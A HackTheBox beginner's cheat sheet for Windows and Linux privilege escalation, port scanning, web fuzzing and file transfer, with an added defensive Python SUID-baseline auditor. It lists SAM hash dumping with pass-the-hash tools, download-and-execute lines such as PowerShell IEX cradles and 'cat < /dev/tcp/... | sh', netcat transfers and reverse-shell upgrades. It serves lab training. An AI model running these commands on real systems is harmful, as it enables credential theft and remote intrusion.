HackTheBox Beginner’s Guide

Windows Enumeration

1. Run systeminfo to get the operating system version, service pack and installed hotfixes, then look for:
   exploits
     $ searchsploit, https://www.exploit-db.com/
   precompiled exploits
     - https://github.com/abatchy17/WindowsExploits
     - https://github.com/SecWiki/windows-kernel-exploits
   exploits for missing hotfixes
     https://github.com/rasta-mouse/Sherlock
2. net users to list local accounts, net user <username> for the details of one account

3. C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM
   $ samdump2 SYSTEM SAM dumps the hashes from the SAM and SYSTEM hives; crack them with john/hashcat or use them directly with Pass the Hash (pth-curl, pth-net, pth-rpcclient, pth-smbclient, pth-smbget, pth-sqsh, pth-winexe, pth-wmic, pth-wmis)
   https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

4. check installed programs in C:\Program Files and other places

cheatsheet https://guif.re/windowseop

Linux Enumeration

1. $ cat /etc/passwd for existing users, check home directories and files owned by those users.

2. $ sudo -l to see whether you can run any binary/script with sudo

3. $ find / -perm -4000 2>/dev/null to check for SUID files

4. $ cat /etc/crontab or crontab -l to see whether any cron jobs are running.
   pspy tool https://github.com/DominicBreuker/pspy/releases to find any binaries/scripts that are run repeatedly.

5. LinEnum.sh https://github.com/rebootuser/LinEnum, -t argument for more thorough test.

6. GTFObins https://gtfobins.github.io: search here for binaries that can be used to escalate privileges.

7. linpeas.sh
    $ linpeas -a > /dev/shm/linpeas.txt
    $ less -r /dev/shm/linpeas.txt
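
A defender-side companion to item 3 (find / -perm -4000), added here and not part of the original guide: it lists a host's SUID files and diffs them against a known-good baseline, so a stray SUID binary stands out in a review. The baseline set and the sample scan in demo() are constructed; scan_suid() is the part you would point at a real filesystem.

```python
"""Defender-side counterpart of `find / -perm -4000`: diff a host's SUID files against a
known-good baseline. Added example, not from the original guide; all data is constructed."""
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Constructed baseline: SUID binaries a hardened image is expected to ship.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/newgrp"}

def is_suid(mode: int) -> bool:
    """True if the set-user-ID bit is present (exactly what -perm -4000 matches)."""
    return bool(mode & stat.S_ISUID)

def scan_suid(root: str = "/") -> Dict[str, int]:
    """Walk the tree under root and return {path: st_mode} for every regular SUID file."""
    found: Dict[str, int] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        # skip pseudo-filesystems that hold no real binaries
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and is_suid(st.st_mode):
                found[path] = st.st_mode
    return found

def audit(found: Dict[str, int], baseline: Iterable[str]) -> Tuple[List[str], List[str]]:
    """Return (unexpected, missing): SUID files not in the baseline, and baseline
    entries that no longer carry SUID. Either direction deserves a look."""
    expected = set(baseline)
    unexpected = sorted(p for p in found if p not in expected)
    missing = sorted(p for p in expected if p not in found)
    return unexpected, missing

def demo() -> Tuple[List[str], List[str]]:
    """Run the audit over constructed scan results standing in for a real host."""
    sample = {
        "/usr/bin/passwd": 0o104755,
        "/usr/bin/sudo": 0o104755,
        "/usr/bin/su": 0o104755,
        "/usr/local/bin/backup": 0o104755,  # SUID binary outside packaged paths
        "/tmp/.x": 0o104755,                # SUID file in a world-writable directory
    }
    return audit(sample, BASELINE_SUID)

if __name__ == "__main__":
    unexpected, missing = demo()  # on a real host: audit(scan_suid(), BASELINE_SUID)
    print("unexpected SUID:", unexpected, "missing from baseline:", missing)
```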

cheatsheet https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Port Scan

$ masscan -p1-65535,U:1-65535 10.10.10.10 --rate=1000 -e tun0

$ nmap -A 10.10.10.10

SYN scan: $ nmap -sCSV 10.10.10.10 -oA synscan
TCP SYN/ACK scan: $ nmap -sTV -p- -Pn 10.10.10.10 -oA fulltcp
UDP scan for SNMP, tftp etc.: $ nmap -sU 10.10.10.10 -oA udpscan

$ nmap -sC -sV -O -oN res 10.10.10.10

Web

dirb, dirsearch, gobuster, wfuzz
$ gobuster -u http://10.10.10.xxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html

https://wfuzz.readthedocs.io/en/latest/
Burp Suite

File Transfer

$ nc -lvnp 1234 > out.file
$ nc 10.10.10.10 1234 < in.file

$ php -S 127.0.0.1:80
$ python3 -m http.server
$ python -m SimpleHTTPServer 80

$ wget/curl
C:\> certutil.exe -f -split -urlcache http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe
C:\> powershell.exe (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe", "C:\Windows\Temp\nc.exe")
C:\> powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')

without wget/curl:
$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sh

SMB method:
Server: $ impacket-smbserver test /root/dir_to_share
Client: C:\> copy \\svr_ip\test\filename.exe

Reverse-Shell

Fully interactive TTY shell:
If you get a reverse shell but no TTY, run: python -c 'import pty; pty.spawn("/bin/bash")', hit CTRL-Z, type "stty raw -echo" and press enter, then type "fg" and press enter (your input is not echoed after the stty command, so simply type fg and press enter).

For Windows shells (rlwrap gives the listener line editing and history):
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444
